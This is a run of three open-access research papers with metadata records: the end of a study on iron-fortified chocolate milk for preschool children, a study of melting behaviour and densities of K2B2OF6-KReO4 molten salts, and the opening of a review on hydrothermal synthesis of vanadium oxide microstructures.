The acceptability of the fortified flavored milk was evaluated by sensory tests. According to the results (Figure 2), the highest acceptability was attributed to the F3 formulation and the lowest score to the F6 sample. In general, all the formulations had a range of appreciation between "I like" and "I like it a lot". The highest score (4.72) was attributed to a lower concentration of iron (11 mg L⁻¹) and a higher amount of sugar (60 g L⁻¹), probably because a less metallic taste and a greater amount of sugar are more appreciated by children. The greater preference for sugar during infancy may be related to the rapid physical growth during this time (Forestell, 2017).
Statistical analysis
The analysis of variance (ANOVA) for the significance test of the model coefficients is shown in Table 3, where the factors and their combinations were factor X1 (iron concentration) and factor X2 (sugar concentration). The analysis indicates that the quadratic effects of the concentrations of iron (X1) and sugar (X2) are the factors with the greatest significance (p < 0.05). According to the magnitude of these coefficients in the model, the two quadratic terms (X1*X1 and X2*X2) are determinants of the sensory acceptability of fortified flavored milk.
The adjusted model for sensory acceptability (SA), resulting from the exclusion of nonsignificant terms (p > 0.05), is presented in Equation 1. The R² value of 0.650 indicates the efficiency of the model. The response optimization process found the optimal values for the factors and sensory acceptability: Fe concentration = 11 mg Fe L⁻¹, sugar concentration = 60 g L⁻¹ and SA = 4.72 (scale from 1 to 5), at a confidence level of 95%. These concentrations coincide with the formulation (F3) with the highest score in the sensory test.
Figure 3a shows the response surface, in which the optimal combinations of factors, both individual and in interaction, were found. The objective is to maximize the score parameter that represents the desirability function. The desirability function evaluates whether the combination of factors satisfies the goals defined for the responses. In this case, the desirability function (0.8046) is close to 1, indicating that the predicted combination of factors would achieve the optimal score. Therefore, the model indicates that the best score is obtained with an iron concentration of 25% of the RDA (11 mg L⁻¹) and a sugar concentration of 60 g L⁻¹ of milk, giving an average score of 4.72.
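Conceptually, the optimization step amounts to maximizing the fitted quadratic over the experimental region. A grid-search sketch follows; the polynomial coefficients are placeholders, since Equation 1 is not reproduced here:

```python
import numpy as np

# Grid search over the experimental region to locate the acceptability
# maximum; the b coefficients are placeholders standing in for Equation 1.
b0, b1, b2, b11, b22 = 1.0, 0.30, 0.05, -0.015, -0.0003   # hypothetical

def predicted_sa(x1, x2):
    return b0 + b1 * x1 + b2 * x2 + b11 * x1**2 + b22 * x2**2

x1 = np.linspace(11, 13, 201)    # iron, mg/L
x2 = np.linspace(50, 60, 201)    # sugar, g/L
X1, X2 = np.meshgrid(x1, x2)
Z = predicted_sa(X1, X2)
i = np.unravel_index(np.argmax(Z), Z.shape)
print(f"optimum: {X1[i]:.1f} mg Fe/L, {X2[i]:.0f} g sugar/L, SA = {Z[i]:.2f}")
# With these placeholder coefficients the maximum falls at the low-iron /
# high-sugar corner (11 mg/L, 60 g/L), mirroring the study's finding.
```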
In addition, the contour plot for overall acceptability as a function of the concentrations of iron and sugar is shown in Figure 3b, which also indicates a general acceptability greater than 4.70 for a formulation of 11 mg L⁻¹ of iron and 60 g L⁻¹ of sugar.
At this iron concentration, chocolate-flavored fortified milk can supply a percentage of the recommended levels for children 3 to 5 years old (11 mg of iron/day) if 250 g of milk is consumed (Institute of Medicine (US), 2001), and it also represents a milk that is desirable for children of these ages according to the optimized sugar level.
Milk characteristics
Flavored milk must meet certain physicochemical and microbiological requirements according to the Peruvian Technical Standard NTP 202.189.2020 (INACAL, 2020); accordingly, its physicochemical parameters were evaluated (Table 4). The protein content of the fortified flavored milk was higher than that of fresh milk, whereas the fat content was lower for the fortified milk. The viscosity value of 4.43 cP may also be influenced by the addition of carrageenan (Yanes et al., 2002).
The concentration of vitamin C (0.693 g L⁻¹) coincides with the amount added to the fortified milk (0.70 g L⁻¹). The addition of vitamin C favors the absorption of heme and non-heme iron in fortified milk formulations and in other foods eaten by children (FAO and WHO, 2002).
The iron concentrations of the iron-fortified milk and the fresh milk were 13.65 mg Fe L⁻¹ and <0.5 mg Fe L⁻¹, respectively. The fortified value represents 3.4 mg of iron in 250 mL, which is within the daily requirement parameters for this mineral in preschool children (11 mg of iron/day) if they consume 250 g of milk per day (Institute of Medicine (US), 2001). The content of incorporated iron is also related to the metallic taste, since at very high concentrations this taste can be perceived (Toldrà et al., 2011). This research worked with formulations whose concentrations contribute to nutritional quality while retaining optimal general acceptability.
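The per-serving figure follows directly from the measured concentration:

```python
# Iron delivered by one 250 mL serving of the fortified milk, against the
# 11 mg/day reference intake for 3-5-year-olds cited above.
iron_mg_per_L = 13.65
serving_L = 0.250
per_serving = iron_mg_per_L * serving_L          # 3.41 mg
share = per_serving / 11                         # ~31% of the daily 11 mg
print(f"{per_serving:.2f} mg per serving ({share:.0%} of 11 mg/day)")
```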
According to Villalpando et al. (2006), a similar iron content was used: 5.8 mg/400 mL of iron as ferrous gluconate, 5.28 mg/400 mL of zinc as zinc oxide, and 48 mg/400 mL of ascorbic acid given to children between 10 and 30 months of age. Ferrous gluconate added to whole cow's milk as a fortifier, along with ascorbic acid, was effective in reducing the prevalence of anemia and improving iron status in children. On the other hand, Gupta et al. (2015) prepared iron microcapsules from salts and incorporated them into a mixture of cow and buffalo milk, obtaining concentrations of 25 mg L⁻¹ of iron, which is higher than that obtained in this investigation.
According to NTP 202.189.2020 (INACAL, 2020), regarding the microbiological requirements of flavored milk, the number of coliforms must be below 3 MPN and the number of mesophilic aerobes must not exceed 50,000 CFU mL⁻¹. In this work, the coliform recommendation was still met after 14 days, but the number of mesophilic aerobes exceeded 50,000 CFU mL⁻¹ at 5 days (Table 5). Thus, consumption is recommended within 5 days.
According to the nutritional information of two national commercial chocolate milks, these present total sugar contents of 4.9 and 9.0 g per 100 mL, respectively; additionally, they contain added sugars and sweetener additives, and their Nutrition Facts labels omit claims of vitamin C or iron content. The Regulation of Law No. 30021, "Ley de Promoción de la Alimentación Saludable para niños y adolescentes" (El Peruano, 2017), requires the indication of an advertising warning sign in the form of an octagon if the sugar content in beverages is greater than or equal to 5 g per 100 mL. Since the optimal formula exceeded this content, it would be necessary to display the advertising label or, in the future, to study the incorporation of sweeteners that balance acceptability with a sugar content below the limit set by Law No. 30021.
These results show a method of fortifying flavored milk that enables the technological use of heme iron as a nutrient extender in the production of dairy products, since it complements the daily requirement of this mineral in children between 3 and 5 years of age.
Conclusion
The concentrations of iron and sugar have a significant effect on the sensory acceptability of chocolate-flavored milk intended for children aged 3-5 years, with the greatest acceptance obtained for 25% (11 mg L⁻¹) of the recommended dose of iron for children in this age range (11 mg for a portion of 250 mL per day) and a sugar content of 60 g L⁻¹. The fortified flavored milk has physicochemical and microbiological characteristics similar to those of flavored milk, complying with the ranges established by the Peruvian technical standard. The shelf life is limited by the number of mesophilic aerobes, which exceeds the values recommended by regulations within a period of 5 days. The results of this study reveal the potential of iron fortification from blood powder in chocolate milk formulation and its use in infant feeding programs.
Figure 1. Sensory evaluation sheet of fortified chocolate milk used with pre-school children.
Figure 3. (a) Response surface plot and (b) contour plot for overall acceptability as a function of the concentrations of iron and sugar.
Table 4. Results of the physicochemical analysis of fresh milk and fortified chocolate-flavored milk.
Table 5. Microbiological analysis of fortified flavored milk.
"year": 2024,
"sha1": "4760299c29ef9d287ec8b779d2a9618f7ee7385f",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.26656/fr.2017.8(3).288",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "13bc4f315d8de591310945ec54c2fa7fb8c5bf3a",
"s2fieldsofstudy": [
"Agricultural and Food Sciences",
"Medicine"
],
"extfieldsofstudy": []
} |
Melting Behavior and Densities of K2B2OF6 Melts Containing KReO4
Methods of simultaneous thermal analysis (differential scanning calorimetry, thermogravimetry) and an analysis of cooling curves were used to study the melting of K2B2OF6-(0-15 wt.%) KReO4 melts. The synthesis of K2B2OF6 was performed by alloying the KF, KBF4, and B2O3 components. The dependence of the liquidus temperature on the content of potassium perrhenate in the K2B2OF6-(0-15 wt.%) KReO4 melts was determined. It was found that the addition of up to 6 wt.% KReO4 caused an increase in the melt liquidus temperature to 733 K. Further increases in potassium perrhenate did not change the temperature of the primary crystallization (733 ± 5 K) of the K2B2OF6-KReO4 melt. This fact testifies to the presence of a monotectic reaction. It was found that the relative loss of mass of the K2B2OF6-(0-15 wt.%) KReO4 melts did not exceed 2.1%. The delamination of the K2B2OF6-KReO4 melt was revealed by the values of the primary crystallization temperatures (liquidus temperatures) in different layers of the melt. The density of the K2B2OF6-KReO4 melts as a function of potassium perrhenate content (0-15 wt.%) was investigated at 628-933 K. The temperature dependences of the K2B2OF6-KReO4 melts' densities were recorded; they can be presented as linear functions. The curves of the density temperature dependence of the K2B2OF6-KReO4 melts were used to determine the critical temperatures, i.e., the boundaries of the miscibility gap. The miscibility gap of the K2B2OF6-KReO4 melts is limited to KReO4 contents between 1 wt.% and 15 wt.%.
Introduction
Rhenium is a rare, refractory metal that is widely used in heat-resistant superalloys, platinum-rhenium catalysts, and prospective structural materials for rocket and space technology [1-13]. The trend of providing various industries with high-tech products over the next 150 years will lead to the exhaustion of the proven reserves of rhenium in the Earth's crust [14]. To date, about 80% of Re is consumed in the production of superalloys, about 15% of Re is used as a catalyst in fuel production, and the remaining 5% of Re is used in alloy form, applied in electrical contacts, electromagnets, heating elements, mass spectrographs, semiconductors, thermocouples, vacuum tubes, etc. [15]. The United States is the main consumer of rhenium, which it primarily uses for heat-resistant alloy production; US consumption reached ~43,000 kg of Re in 2021, with a total global Re production of 59,000 kg per year. Global interest in Re is expected to grow, especially in the space industry. Rhenium is an important metal for different industrial areas, which is why having a stable rhenium production source has become a vital issue. Thus, Pratt & Whitney, an aerospace manufacturer, analyzed the market and came to the conclusion that their key operation of gas turbine engine design and production might be affected by rhenium shortages; therefore, in 2014, the company bought 230,000 kg of Re to ensure a stable operation cycle [12]. Currently, Re is produced as a by-product of pyrometallurgical molybdenum production. During this process, rhenium compounds are oxidized to the volatile rhenium oxide, Re2O7. This oxide is collected together with outgoing smoke gases and extracted in the form of rhenium acid or ammonium perrhenate. Ammonium perrhenate is the raw product for further metallic rhenium production. Metallic rhenium is mainly produced by reduction using gaseous hydrogen at temperatures close to 1273 K [16]. In this regard, significant effort should be dedicated to identifying resource-saving technologies for the recycling of rhenium materials. The most promising secondary sources of rhenium were predicted [1] to be the KReO4 and NH4ReO4 compounds or rhenium metal powder (as a result of its reduction by hydrogen). The method of hydrogen reduction has a number of disadvantages, such as complex instrumentation requirements, the usage of gaseous hydrogen at high temperatures, and the possibility of obtaining rhenium only in powder form.
Molten salt electrolysis is a promising process for obtaining rhenium. It can enable both the production of metallic rhenium from its compounds and the compaction of metallic rhenium powders, yielding finished or semi-finished products with a density close to the theoretical one [2]. The properties of molten salts are the basis of electrochemical technologies for obtaining metals [17,18]. It is widely known that, by using molten salts, it is possible to obtain metallic coatings with desired properties, including roughness, mechanical strength, specific surface, density, etc. [19,20].
The fluoroborate melts' liquidus temperature and the densities' temperature dependence are required to develop the electrolytic rhenium-obtaining process. No corresponding data for fluoroborate melts were found.
The liquidus temperature determines the lowest temperature that can be used in electrolysis. Data on the melt densities are required for technological calculations and equipment design. In addition to their practical significance, the liquidus temperature and density data are also important for the investigation of the interaction of KReO4 with KF-KBF4-B2O3 melts.
Nevertheless, Kataev et al. presented data on the interaction of B2O3 with fluoride KF-AlF3 and KF-NaF-AlF3 molten salts [23]. It was found that the interaction between individual components of the melts proceeds according to reaction (1). Oxyfluoroborate, K2B2OF6, can be obtained using this reaction. The thermodynamic possibility of oxyfluoroborate formation has been verified and experimentally confirmed [24]. The reaction that binds the various boron complex compounds in the melts is given as reaction (2). The results in [24] show that the K2B2OF6 melt is formed in the KF-KBF4-B2O3 molten mixture in the form of oxyfluoroborate complexes according to reaction (2). The melting point of K2B2OF6 is 628 K, and that of K3B3O3F6 is 705 K [25].
Potassium perrhenate (KReO4) is a rhenium chemical compound with a relatively low melting temperature of 828 K and a boiling temperature of 1643 K [26].
The purpose of this work was to obtain the densities' temperature dependence and to determine the liquidus temperature of the prospective KF-KBF4-B2O3-KReO4 melts. The KF-KBF4-B2O3 melt was chosen as a solvent because its composition corresponds stoichiometrically to the low-melting potassium oxyfluoroborate, K2B2OF6. The results obtained are required for determining the basics of a rhenium-obtaining technology based on the electrolysis of KF-KBF4-B2O3-KReO4 melts.
The potassium perrhenate powder was dried at 423 K for 3 h in air in a glassy carbon container. Potassium tetrafluoroborate was dried at 473 K for 2 h. B2O3 was remelted under vacuum and then used in powdered form. The prepared substances were used for the melt preparation.
The substances were mixed to prepare a KF (37.28 wt.%)-KBF4 (40.39 wt.%)-B2O3 (22.33 wt.%) mixture. The mixture was placed in the glassy carbon container, and the container was placed inside a quartz retort. It was then heated to 773 K and kept in the molten state for 4 h. Thus, a stoichiometric melt corresponding to the K2B2OF6 composition was synthesized. To confirm the phase composition of the resulting melt, an X-ray phase analysis was carried out using a Rigaku D/MAX-2200VL/PC X-ray diffractometer (Rigaku Corporation, Matsubara-cho, Akishima-shi, Tokyo, Japan). Figure 1 shows the results of the K2B2OF6 molten salt X-ray analysis.
The required content of the potassium perrhenate powder was added to the K2B2OF6 melts to form the desired K2B2OF6-KReO4 melts. The prepared mixture was subjected to a chemical composition analysis, the results of which are presented in Table 1. The results of the X-ray analysis show that the initial K2B2OF6 melt is monophase. The obtained results correspond to the experimental data reported in [24].
Measuring Procedures
Density measurements are generally carried out according to the hydrostatic weighing method. The method involves measuring the change in the weight of a spherical platinum weight immersed in the melt [27-29].

The experimental cell was a quartz retort plugged with a vacuum rubber stopper, which was connected to a Mettler AT20 electronic balance (Mettler-Toledo GmbH, Greifensee, Switzerland). The platinum weight (diameter of 6.8 × 10⁻³ m) was hung on a platinum wire, about 0.6 m long and 2 × 10⁻⁴ m in diameter, connected to the electronic balance.

A special lift was used to immerse the platinum weight in, and extract it from, the melt. All measurements were carried out in an argon atmosphere of 99.999% purity (UralCryoGas LLC, Ekaterinburg, Russia). The spherical platinum weight was successively weighed, first in the gaseous atmosphere and then in the molten salts.
The densities of the molten salts were calculated according to Equation (3), in which the difference between the weight's mass in the gaseous atmosphere and in the melt is divided by the volume of the weight:

d = (m1 − m2)/V, (3)

where d is the melt density, kg/m³; m1 is the mass of the weight in the air, kg; m2 is the mass of the weight immersed in the melt, kg; and V is the volume of the Pt ball, equal to 1.6485 × 10⁻⁷ m³. A schematic of the measuring cell is presented in Figure 2.
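Equation (3) translates directly into a one-line calculation; the masses in the example below are hypothetical readings, chosen only to show the scale of the result:

```python
# Melt density from hydrostatic weighing, Equation (3): the apparent mass
# loss of the immersed platinum ball divided by its volume.
V_BALL = 1.6485e-7   # m^3, volume of the Pt ball (from the text)

def melt_density(m_air_kg: float, m_melt_kg: float) -> float:
    return (m_air_kg - m_melt_kg) / V_BALL   # kg/m^3

# Illustrative reading (masses are hypothetical): a 0.33 g apparent loss
# corresponds to roughly 2000 kg/m^3.
print(melt_density(7.00e-3, 6.67e-3))        # -> ~2001.8 kg/m^3
```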
The density investigation of the K2B2OF6-KReO4 melts was carried out in a temperature range of 628-929 K. A glassy carbon crucible, SU-2000 (DONKARB GRAFITE LLC, Chelyabinsk, Russia), was used as the container for the melts. The crucible had a volume of 1.1 × 10⁻⁴ m³ (dimensions: base diameter 5 × 10⁻² m, top diameter 7.3 × 10⁻² m, height 6.9 × 10⁻² m). A moving device was used to fix the platinum weight's location along the crucible axis with an accuracy of 10 µm.

The density measurements for each melt composition were repeated at least 3 times, and the results of the parallel measurements were averaged.

The preliminary experiments elucidated that the K2B2OF6-KReO4 melts are layered systems. The results of the density measurements can be represented for two positions. The top position is realized when the platinum weight is located about 5 × 10⁻³ m below the melt surface, and the bottom position when the platinum weight is located about 5 × 10⁻³ m above the crucible bottom. Changing the platinum weight's position by 1-2 × 10⁻³ m lower or higher resulted in the densities' temperature dependence being irreproducible when recorded at different temperatures. This fact can be explained by the influence of two non-mixed liquids on the platinum weight. It should be mentioned that, when using this method, the interfacial forces acting on the Pt wire at the upper-liquid-gas and lower-liquid-upper-liquid interfaces [30] cause a singularity.

The crystallization temperatures and the temperatures of phase transitions were obtained by performing a thermal analysis based on a heat-release evaluation. The time dependence of the thermocouple EMF was recorded using an APPA 502 multimeter (APPA Technology Corp., New Taipei City, Taiwan) during both the heating and cooling of the melts. The temperature was automatically measured every second. The average cooling and heating rates were 4.8 and 7.1 K per minute, respectively. The differences in the temperatures of the phase-transition points obtained during heating/cooling cycles did not exceed the measurement error (~5 K).
Results and Discussion
The study of the K2B2OF6-KReO4 melts was carried out over a temperature range of 307-873 K by STA. Figure 3 shows the data from the DSC and thermogravimetric analyses of the K2B2OF6 melts.
According to Figure 3, there are a number of phase transitions in solid K2B2OF6-KReO4 while heating to the melting point of K2B2OF6. An exothermic heat release was observed at 403 K; this can be related to grain recrystallization caused by the compaction of the crystal structure. A significant change in the heat flux was observed at 551.4-552.2 K. The phase-transition temperature coincided with that predicted for the formation of K10B38O62 structural groups [31]. It should be noted that the samples of the K2B2OF6 melts, including those containing KReO4, were X-ray amorphous, so it is difficult to identify a specific phase transition in the solid state. It was found that the melting temperature of the K2B2OF6 compound was 628 K. According to the differential scanning calorimetry data, the solidus temperature for the K2B2OF6-(0-15 wt.%) KReO4 melts was 628 K.
It was found that the addition of up to 6 wt.% KReO4 to the K2B2OF6 melts resulted in the appearance of an exothermic effect at a temperature of about 773 K, which was accompanied by an increase in the mass loss of the melts (Figure 4). This fact is probably related to the crystallization area of the volatile Re2O7 and the more refractory K3ReO5 compound. The presence of rhenium compounds in the Re+7 oxidation state in the K2B2OF6-KReO4 melts is in agreement with the results reported in [32]. Presumably, a reaction releasing rhenium oxide takes place in the melts.

The presence of the K3ReO5 compound in the samples of the K2B2OF6-KReO4 melts was detected by X-ray phase analysis (Figure 5). The data analysis showed that rhenium was present in two phases, namely, KReO4 and K3ReO5, in the solidified melts [33]. The K2B2OF6 compound had a glass structure, and it did not show any individual peaks in the diffraction pattern. The presence of any other phases was not determined.

An increase in the content of KReO4 from 2 to 6 wt.% resulted in a decrease in the temperature of the exothermic heat release from 793 to 773 K. We associate this with the fact that the melt composition shifts toward the area of K3ReO5 crystallization in the K2B2OF6-KReO4 phase diagram.

All thermal effects can be systemized. The majority of them are associated with phase transitions in the solid states of K2B2OF6 and K2B2OF6-KReO4, and additional investigations will be necessary in the future to determine their mechanisms (Table 2).
The analyses of the thermogravimetric dependence indicate that the relative loss of mass does not exceed 2.05% for the K2B2OF6 melts with the addition of 15 wt.% of KReO4 at 873 K. The data obtained were used as a source for determining the liquidus temperatures of the K2B2OF6-KReO4 system. Table 3 shows the liquidus temperatures of the K2B2OF6-KReO4 systems depending on the KReO4 content. It was found that an increase in the KReO4 concentration to 6 wt.% results in the liquidus temperature rising from 628 to 733 K. Increasing the potassium perrhenate concentration above 6 wt.% does not influence the liquidus temperature. The immutability of the liquidus temperature of the K2B2OF6-KReO4 melts with increasing KReO4 content indicates the presence of a miscibility gap. Further measurements of the liquidus temperatures of the K2B2OF6-KReO4 melts at various melt-level points confirmed the existence of the phase separation. The liquidus temperature stabilization at 733 K for melt compositions of K2B2OF6-(4-15 wt.%) KReO4 elucidated that the melt state was within the boundaries of the miscibility gap of the phase diagram.
The experimental data on the liquidus temperature were used to determine the temperature range of the density measurements of the K2B2OF6-KReO4 melts. The temperature dependence of the densities was measured at two level points of the K2B2OF6-KReO4 melts: (1) immersed by 5 × 10⁻³ m from the melt mirror (upper layer, "U"); (2) suspended about 5 × 10⁻³ m from the bottom of the container with the melt (conditionally, the lower layer, "L"). It was discovered that the temperature dependence of the melt densities could be described by linear equations (Table 2). It was found that the K2B2OF6 and K2B2OF6-1 wt.% KReO4 melts (Nos. 1 and 2 in Table 2) did not delaminate over the entire range of temperatures studied.
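Obtaining such linear coefficients from the raw readings is a one-line least-squares fit; the temperature and density arrays below are hypothetical readings for a single layer:

```python
import numpy as np

# Fitting the linear density-temperature dependence rho(T) = a + b*T for one
# layer of a melt; the readings below are hypothetical.
T = np.array([650.0, 700.0, 750.0, 800.0, 850.0])           # K
rho = np.array([2100.0, 2080.0, 2061.0, 2040.0, 2021.0])    # kg/m^3

b, a = np.polyfit(T, rho, 1)   # slope b (kg m^-3 K^-1) and intercept a
print(f"rho(T) = {a:.1f} + ({b:.3f})*T")
```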
Melts Nos. 3-10 (Table 3) delaminated; the densities of the upper and lower layers differed significantly. The temperature dependences of the densities of the K2B2OF6-KReO4 melts are shown in Figure 6.

It was found that the addition of up to 1 wt.% KReO4 had a negligible influence on the density homogeneity of the K2B2OF6-KReO4 melts.

Phase separation was observed for the K2B2OF6-KReO4 melts with KReO4 contents above 4 wt.%. It can be seen from the experimental data that the densities of the upper and lower phases started to differ, and the phases did not mix at up to 15 wt.% KReO4. Such behavior is consistent with the data obtained by measuring the densities of stratified molten salt systems [22].

The behavior of the temperature dependence of the densities of the K2B2OF6-KReO4 (4-15 wt.%) melts (compositions with phase separation) is in accordance with the results reported in [34]; the densities' temperature dependence can be approximated by linear functions.

The density of the heavier phase of K2B2OF6-KReO4 (4-10 wt.%) decreased more rapidly. This indirectly indicates the lower solubility of the heavy component in the light layer and its better solubility in the heavy layer. The densities of the upper and lower phases approached each other as the temperature and KReO4 content increased. Figure 7 shows the density isotherms of the K2B2OF6-KReO4 melts for the upper and lower layers at T = 820 K.
The density of the heavier phase of K 2 B 2 OF 6 -KReO 4 (4-10 wt.%) decreased more rapidly.This indirectly indicates the lower solubility of the heavy component in the light layer and its better solubility in the heavy layer.The densities of the upper and lower phases approached each other as the temperature and KReO 4 content increased.Figure 7 shows the density isotherms of the K 2 B 2 OF 6 -KReO 4 melts for the upper and lower layers at T = 820 K.It was found that the melt density increased as the composition of the K2B2OF6-KReO4 (4-15 wt.%) melts changed.This is in agreement with the fact that a higher rhenium concentration (as a powerful complexing agent) increases the densities of the K2B2OF6-KReO4 melts.The densities of the upper and lower layers were found to vary.This indicates that the K2B2OF6-KReO4 (4-15 wt.%) melts are characterized by different values of critical temperature.The critical temperature is the upper boundary of the miscibility gap.At the same time, the trend changed significantly for the K2B2OF6-15 wt.% KReO4 melts (Figure 7), and it indicates the convergence of phase densities to the critical point at lower temperatures.
Tkachev et al. reported that the value of the critical temperature TCr, i.e., the upper boundary of the miscibility gap in a molten salt, corresponds to equal densities of the two liquids within the boundaries of the miscibility gap. Thus, the critical temperature can be predicted by solving the system of linear equations (Table 3) for one composition, provided that the densities of the upper and lower layers are equal:

ρu = au + bu·T, ρl = al + bl·T, ρu(TCr) = ρl(TCr),

where T is the temperature, K; ρu is the upper layer's density, g/cm³; ρl is the lower layer's density, g/cm³; and au, bu, al, bl are the coefficients of the linear equations of the densities' temperature dependence for the upper and lower layers. We calculated the critical temperatures for the K2B2OF6-KReO4 (4-15 wt.%) molten systems. For that purpose, the system of equations of the densities' temperature dependence (data of Table 2) was constructed for the upper and lower layers. The solution to the system of equations was obtained under the condition of equality of the upper- and lower-layer densities at the critical temperature TCr.
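Setting the two linear fits equal gives TCr in closed form, TCr = (al − au)/(bu − bl). A sketch with hypothetical coefficients (the real ones are in Table 3):

```python
# Critical temperature where the upper- and lower-layer linear fits meet:
# a_u + b_u*T = a_l + b_l*T  =>  T_cr = (a_l - a_u) / (b_u - b_l).
def critical_temperature(a_u, b_u, a_l, b_l):
    if b_u == b_l:
        raise ValueError("parallel fits: layers never reach equal density")
    return (a_l - a_u) / (b_u - b_l)

# Hypothetical coefficients standing in for one composition from Table 3.
print(critical_temperature(a_u=2500.0, b_u=-0.55, a_l=3200.0, b_l=-1.05))
# -> 1400.0 K
```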
The obtained values of the critical temperature, as well as the liquidus and monotectic ones, can be summarized. Figure 8 shows the liquidus, monotectic, and critical temperatures of the K2B2OF6-KReO4 (0-15 wt.%) melts.
The results of the critical temperature calculation indicate that the peak of the miscibility gap in the K 2 B 2 OF 6 -KReO 4 melts corresponds to a temperature of about 1416 K at a potassium perrhenate concentration of 6 wt.%. The dependence of the critical temperature on the concentration of potassium perrhenate passes through an extremum. An increase in the potassium perrhenate content up to 15 wt.% in the K 2 B 2 OF 6 -KReO 4 melts causes the critical temperature to decrease down to 775 K. Thus, the miscibility gap of the K 2 B 2 OF 6 -KReO 4 melts lies within 1 wt.% and 15 wt.% of the KReO 4 concentration.
Conclusions
The behavior of the K 2 B 2 OF 6 -KReO 4 (0-15 wt.%) melts was studied by synchronous thermal analyses (differential scanning calorimetry and thermogravimetry) and the analysis of cooling curves. The liquidus and monotectic temperatures of the K 2 B 2 OF 6 -KReO 4 (0-15 wt.%) melts were determined. It was found that the addition of up to 6 wt.% of the KReO 4 compound caused the liquidus temperature to increase up to 733 K. A further increase in the potassium perrhenate concentration did not influence the primary crystallization temperature (733 ± 5 K) of the K 2 B 2 OF 6 -KReO 4 melts. This fact confirms the occurrence of the monotectic reaction. The primary crystallization temperature values of the various layers of the melt reveal the presence of phase separation in the K 2 B 2 OF 6 -KReO 4 melts. It was found that the relative mass loss of the K 2 B 2 OF 6 -(0-15 wt.%) KReO 4 melts did not exceed 2.05%.
The densities of the K 2 B 2 OF 6 -KReO 4 melts were studied by varying the potassium perrhenate concentration from 0 to 15 wt.% at T = 628-933 K. It was observed that the addition of 1 wt.% of KReO 4 to K 2 B 2 OF 6 caused a slight density decrease. The densities increased and phase separation was observed in the KReO 4 concentration range of 4-15 wt.%. This is in agreement with the conclusions on the melt phase separation obtained from the analysis of the cooling curves.
The upper boundary of the miscibility gap was determined by calculating the melts' critical temperatures. The dependence of the critical temperature on the concentration of potassium perrhenate in the K 2 B 2 OF 6 -KReO 4 melts has an extreme character, with a maximum at about T = 1416 K and 6 wt.% of the KReO 4 component.
Figure 6. Experimental temperature dependence of the densities of the K 2 B 2 OF 6 -KReO 4 melts.
Figure 7. Density of the K 2 B 2 OF 6 -KReO 4 melts depending on the content of potassium perrhenate at T = 820 K.
Table 1. Contents of elements in the obtained deposits.
Table 3. Coefficients of the temperature dependence of the densities of the K 2 B 2 OF 6 -KReO 4 melts.
"year": 2023,
"sha1": "7fc093c30ed95e213381a8a1cd8c5dbae1483088",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2227-9717/11/11/3148/pdf?version=1699019605",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "1547e56ac45fdf1877ae5dfdf609def300223eab",
"s2fieldsofstudy": [
"Materials Science"
],
"extfieldsofstudy": []
} |
Hydrothermal Synthesis of Vanadium Oxide Microstructures with Mixed Oxidation States
This review is based on hydrothermal synthetic procedures that generate different vanadium oxide microstructures with mixed oxidation states, where different vanadium (V 5+ ) precursors (vanadate, vanadium oxide, vanadium alkoxide, etc.) are used to obtain various types of morphologies and shapes, such as sea urchins, cogs, stars, squares, etc., depending on the amphiphilic molecules (usually surfactants) exhibiting a structural director role and containing an organic functional group, such as primary amines and thiols, respectively. The performance of the sol-gel methodology, where intercalation processes sometimes take place, is crucial prior to the hydrothermal treatment stage to control the V 4+ /V 5+ ratio. In every synthesis, many physical and chemical parameters, such as temperature, pH, reaction time, etc., are responsible for influencing the reactions in order to obtain different products; the final material usually corresponds to a mixed oxidation state structure with different content ratios. This feature has been used in many technological applications, and some researchers have enhanced it by functionalizing the products to improve their electrochemical and magnetic properties. Although some results have been auspicious, there are a number of projects underway to improve the synthesis in many ways, including yield, secondary products, size distribution, oxidation state ratio, etc., to achieve the best benefits from these microstructures in the large number of technological, catalytic, and magnetic devices, among other applications.
Introduction
Vanadium oxide nanostructures and microstructures have been researched in many technological applications [1][2][3][4][5], exhibiting amazing morphological characteristics [6] with different architecture types [7], from very well-defined geometric forms [8] to novel spherical clusters consisting of high-density radial arrays made from self-assembled nanotubes [9]. There are several synthetic procedures employed, such as sol-gel processes assisted by amphipathic surfactants and enhanced by hydrothermal treatment; the temperature employed in the latter stage ranges from 180-200 °C, and the reaction time lasts from a few hours up to 10 days [10,11]. The most common V 5+ precursors used as starting materials are V 2 O 5 (vanadium (V) pentoxide) [12], vanadium alkoxides such as VO(OCH(CH 3 ) 2 ) 3 (vanadium (V) oxytriisopropoxide) [13,14], VOCl 3 (vanadium (V) oxytrichloride) [15], and NH 4 VO 3 (ammonium metavanadate) [16,17]. The synthesis commonly requires soft chemical conditions (controlled pH, inert atmosphere, room temperature) and produces the vanadium oxide network, described as an intercalation host lattice [18], where guest species are reversibly inserted between the oxide layers [19][20][21]. Amphiphilic molecules, such as amphipathic surfactants, comprising organic functional groups, such as RNH 2 and H 2 NRNH 2 (long chain alkyl primary monoamines C n H (2n+1) NH 2 , diamines H 2 NC n H (2n) NH 2 ), and dipeptides, are commonly intercalated [22][23][24][25]. Other surfactants with secondary and tertiary amines have also been employed [26,27], improving the obtention of different vanadium oxide networks, mainly layered hybrid organic-inorganic intercalation compounds, referred to as organic-inorganic layered composites with novel physical chemical properties. These vanadium oxide layers usually interact under cooperative van der Waals forces [28], mainly between the vanadyl bond (V = O) and the amine functional group [29]; the most frequent interactions are hydrogen bonds and ion-dipole forces; these interactions generate different degrees of partial reduction, depending on the amphiphilic functional group [30][31][32][33]. Vanadium oxide chemistry is based on shifting the vanadium atom's highest oxidation state to lower ones [34]; the partial reduction often yields mixed oxidation states [35]. The redox reactions performed to obtain different nanostructures are applied to various vanadium oxide (V 5+ ) precursors; the reduction proceeds to V 4+ and V 3+ , and, frequently, V 4+ /V 5+ and V 4+ /V 3+ mixed oxidation states are obtained in the final product [36][37][38]. These reactions are also associated with the valence, which usually coincides with the oxidation states in the structural lattice. Zabalij et al. [39] conducted a comprehensive study of vanadium oxides focusing on the V ion polyhedral coordination in open extended networks, where the vanadium cation can adopt many coordination polyhedrons with the oxygen atoms, ranging from tetrahedrons (T) and trigonal bipyramids (TB), which exhibit two variants (TB type I and TB type II), to square pyramids (SP), distorted octahedrons (O), and rectilinear octahedrons (RO) (tetra-, penta-, and hexa-coordination, respectively). This wide polyhedron coordination spectrum originates from its unique and bountiful structural chemistry; Figure 1 shows the V ion oscillation from tetrahedron to other polyhedrons with penta- and hexa-coordination.
